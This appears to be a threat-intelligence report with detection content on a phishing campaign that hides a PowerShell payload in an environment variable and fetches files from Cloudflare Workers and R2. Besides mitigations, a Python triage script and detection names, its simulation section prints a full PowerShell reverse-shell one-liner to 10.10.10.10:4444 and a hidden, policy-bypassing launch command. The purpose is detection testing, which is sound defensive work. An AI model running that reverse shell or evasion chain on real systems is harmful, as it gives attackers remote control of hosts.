The Evil MSI Background Returns
Summary
A phishing email carrying a WeTransfer link delivers a JavaScript file that stores an obfuscated payload inside an environment variable. That payload is later decoded and executed through PowerShell launched via WMI, which downloads a malicious MSI-style background JPEG and a .NET DLL from Cloudflare Workers and R2 storage. The DLL is a modified build of Microsoft.Win32.TaskScheduler used to load follow-on payloads and possibly create persistence through scheduled tasks. The campaign highlights how threat actors continue to abuse legitimate cloud services to host and distribute malicious components.
Investigation
The analyst identified an initial JavaScript file named Remittance Advice.js containing ROT13-obfuscated code that creates the INTERNAL_DB_CACHE environment variable. PowerShell is then launched in a hidden window through WMI and runs the decoded script block. That script retrieves a JPEG file from a workers.dev subdomain and a PNG file from a public r2.dev bucket, both likely used to carry additional payloads through steganographic methods. The final-stage component is a .NET DLL derived from the open-source TaskScheduler library.
Mitigation
Organizations should block access at the firewall or proxy layer to the domains abused in this campaign, such as we.tl, workers.dev, and r2.dev. PowerShell execution and WMI-based process creation should be restricted for untrusted users wherever possible. Defenders should also monitor for hidden PowerShell execution, abuse of the Win32_Process.Create method, and unusual environment variables such as INTERNAL_DB_CACHE. Files downloaded from public cloud storage should be subjected to strict validation and inspection before use.
Response
Security teams should alert when PowerShell is started with a hidden window through WMI and when the INTERNAL_DB_CACHE variable is created or modified. Any process that connects to the identified URLs or downloads content from workers.dev or r2.dev should be investigated immediately. Forensic analysis should focus on locating the malicious .NET DLL and identifying newly created scheduled tasks that rely on the TaskScheduler library. Affected hosts should be remediated promptly, and detection content should be updated with the observed indicators.
Attack Flow
graph TB
    %% Class definitions
    classDef action fill:#99ccff
    classDef tool fill:#ffcc99
    classDef process fill:#ffeb99
    classDef malware fill:#ff9999
    classDef file fill:#ccccff

    %% Node definitions
    action_phishing["<b>Action</b> – <b>T1566.002 Phishing: Spearphishing Link</b><br/><b>Description</b>: Sends email with a malicious WeTransfer link to victims"]
    class action_phishing action
    tool_js["<b>Tool</b> – <b>JavaScript Payload</b><br/><b>Techniques</b>: T1027.008 Obfuscated Files or Information, T1132 Data Encoding<br/><b>Description</b>: Executes and sets an environment variable containing a ROT13/modified Base64 payload"]
    class tool_js tool
    process_wmi_ps["<b>Process</b> – <b>PowerShell via WMI</b><br/><b>Techniques</b>: T1216 Signed Binary Proxy Execution, T1036.009 Masquerading, T1564.010 Hide Artifacts<br/><b>Description</b>: Launches a hidden PowerShell process through WMI"]
    class process_wmi_ps process
    malware_taskdll["<b>Malware</b> – <b>.NET TaskScheduler DLL</b><br/><b>Technique</b>: T1127.003 Trusted Developer Utilities Proxy Execution<br/><b>Description</b>: Loads the decoded payload as a .NET DLL and registers it with the Task Scheduler"]
    class malware_taskdll malware
    tool_downloader["<b>Tool</b> – <b>Downloader</b><br/><b>Techniques</b>: T1578 Acquire Infrastructure, T1538 Data from Cloud Storage, T1537 Transfer Data to Cloud Account<br/><b>Description</b>: Retrieves additional files from Cloudflare Workers and R2 storage"]
    class tool_downloader tool
    file_png["<b>File</b> – <b>Steganographic PNG</b><br/><b>Description</b>: PNG image containing hidden data that is later processed"]
    class file_png file

    %% Connections showing attack flow
    action_phishing -->|delivers| tool_js
    tool_js -->|executes and sets| process_wmi_ps
    process_wmi_ps -->|launches| malware_taskdll
    malware_taskdll -->|loads| tool_downloader
    tool_downloader -->|fetches| file_png
Detections
The Possibility of Execution Through Hidden PowerShell Command Lines (via cmdline)
LOLBAS WScript / CScript (via process_creation)
Possible Cloudflare Development Domain Abuse (via dns)
PowerShell Environment Variable with Encoded Payload Execution [Windows Powershell]
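As an added example that is not part of the original report or of the detection platform's own rule logic, the Python script below applies the four detections listed above to a handful of constructed process-creation and DNS events. The field names, the regular expressions and every sample value (paths, hostnames, the parent process) are my own assumptions, modelled loosely on Sysmon event fields; only INTERNAL_DB_CACHE, workers.dev, r2.dev and the Stage 2 command-line pattern come from the report. It goes slightly beyond the text by also flagging hidden PowerShell that is not spawned through WMI, so the WMI-parented case can be scored separately.

```python
import re
from typing import Dict, List

# Constructed sample telemetry (not from a real incident), loosely modelled on
# Sysmon process-creation (EID 1) and DNS query (EID 22) fields.
PS_PATH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\wscript.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Windows\System32\WScript.exe" "C:\Users\u\Downloads\Remittance Advice.js"'},
    {"type": "process", "image": PS_PATH,
     "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "
                "[ScriptBlock]::Create([Text.Encoding]::Unicode.GetString("
                "[Convert]::FromBase64String($env:INTERNAL_DB_CACHE)))"},
    {"type": "dns", "image": PS_PATH, "query": "cdn-assets.example-worker.workers.dev"},
    {"type": "dns", "image": PS_PATH, "query": "pub-0123abcd.r2.dev"},
    {"type": "process", "image": PS_PATH, "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"},   # benign admin script
    {"type": "dns", "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "query": "www.cloudflare.com"},                                          # benign lookup
]

# Pattern definitions (assumptions approximating the listed detections).
HIDDEN_WINDOW_RE = re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.IGNORECASE)
ENV_PAYLOAD_RE = re.compile(r"FromBase64String\(\s*\$env:[A-Za-z0-9_]+\s*\)", re.IGNORECASE)
SCRIPTBLOCK_RE = re.compile(r"\[ScriptBlock\]::Create", re.IGNORECASE)
SCRIPT_FILE_RE = re.compile(r"\.(?:js|jse|vbs|vbe|wsf)\b", re.IGNORECASE)
USER_PATH_RE = re.compile(r"\\Users\\[^\\]+\\(?:Downloads|AppData\\Local\\Temp)\\", re.IGNORECASE)
CF_DEV_DOMAIN_RE = re.compile(r"(?:^|\.)(?:workers|r2)\.dev$", re.IGNORECASE)
POWERSHELL = ("powershell.exe", "pwsh.exe")
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
WMI_HOST = "wmiprvse.exe"
IOC_ENV_VAR = "INTERNAL_DB_CACHE"   # campaign-specific indicator from the report


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(event: dict) -> List[str]:
    """Return the names of every detection the event satisfies (empty if benign)."""
    hits: List[str] = []
    if event["type"] == "process":
        image = basename(event["image"])
        parent = basename(event.get("parent", ""))
        cmd = event.get("cmdline", "")
        if image in POWERSHELL and HIDDEN_WINDOW_RE.search(cmd):
            hits.append("hidden_powershell_cmdline")
            if parent == WMI_HOST:          # Win32_Process.Create spawns under WmiPrvSE.exe
                hits.append("hidden_powershell_via_wmi")
        if image in POWERSHELL and ENV_PAYLOAD_RE.search(cmd) and SCRIPTBLOCK_RE.search(cmd):
            hits.append("env_var_encoded_payload")
        if IOC_ENV_VAR in cmd.upper():
            hits.append("ioc_internal_db_cache")
        if image in SCRIPT_HOSTS and SCRIPT_FILE_RE.search(cmd) and USER_PATH_RE.search(cmd):
            hits.append("lolbas_script_host_user_path")
    elif event["type"] == "dns":
        if CF_DEV_DOMAIN_RE.search(event["query"]):
            hits.append("cloudflare_dev_domain")
    return hits


def triage(events: List[dict]) -> Dict[str, List[int]]:
    """Map each detection name to the indexes of the events that triggered it."""
    findings: Dict[str, List[int]] = {}
    for idx, ev in enumerate(events):
        for rule in evaluate(ev):
            findings.setdefault(rule, []).append(idx)
    return findings


if __name__ == "__main__":
    for rule, idxs in triage(SAMPLE_EVENTS).items():
        print(f"{rule:32s} events={idxs}")
```

On the constructed sample, the WScript launch of Remittance Advice.js, the WMI-parented hidden PowerShell with the env-var decode pattern, and the two Cloudflare development-domain lookups fire, while the scheduled admin script and the ordinary cloudflare.com lookup stay silent. In production the parent check matters most: a hidden PowerShell with WmiPrvSE.exe as parent is far rarer than a hidden PowerShell in general, so it deserves the higher severity.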
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
Attack Narrative & Commands:
The attacker first injects a base64-encoded PowerShell payload into a process-level environment variable named INTERNAL_DB_CACHE. This payload, when decoded, launches a reverse shell. The attacker then invokes a second PowerShell process that reads the variable and executes it via ScriptBlock::Create, thereby keeping the malicious command out of the immediate command line. This "living-off-the-land" approach avoids static signature detection and leverages the two-step pattern the rule is designed to catch.
Stage 1 – Encode payload and store in env var
$payload = '$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
$enc = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))
[Environment]::SetEnvironmentVariable("INTERNAL_DB_CACHE", $enc, "Process")
Stage 2 – Execute the encoded payload from the env var
powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command [ScriptBlock]::Create([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($env:INTERNAL_DB_CACHE)))
Regression Test Script: The script below automates the two steps, captures timestamps for correlation, and inserts a short pause to let the first process finish before the second starts.
# ----------------------------------------------
# PowerShell simulation of env-var encoded payload
# ----------------------------------------------
# Step 1 – Encode a small benign payload (a short sleep) and store it in the env var
$payload = '$Sleep = 5; Start-Sleep -Seconds $Sleep'   # benign stand-in; no C2 address is needed for the test
$enc = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))
[Environment]::SetEnvironmentVariable("INTERNAL_DB_CACHE", $enc, "Process")
Write-Host "[*] Environment variable INTERNAL_DB_CACHE set."

# Short pause to ensure the first command is logged
Start-Sleep -Seconds 2

# Step 2 – Execute the payload from the variable. The command string is the Stage 2
# command line above, single-quoted so the parent shell does not expand $env: itself;
# the child process inherits INTERNAL_DB_CACHE, and "&" invokes the created script block.
powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command `
    '& ([ScriptBlock]::Create([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($env:INTERNAL_DB_CACHE))))'
Write-Host "[*] Payload execution triggered."
Cleanup Commands: Remove the temporary environment variable and terminate any stray processes created during the test.
# Remove the test environment variable
[Environment]::SetEnvironmentVariable("INTERNAL_DB_CACHE", $null, "Process")
Write-Host "[*] CLEANUP – INTERNAL_DB_CACHE removed."

# Ensure no orphaned powershell.exe instances remain (exclude the current session).
# Note: this stops every other powershell.exe on the host, not only those started by
# the test, so run it on a dedicated test machine.
Get-Process -Name "powershell" | Where-Object {$_.Id -ne $PID} | Stop-Process -Force
Write-Host "[*] CLEANUP – orphaned PowerShell processes terminated."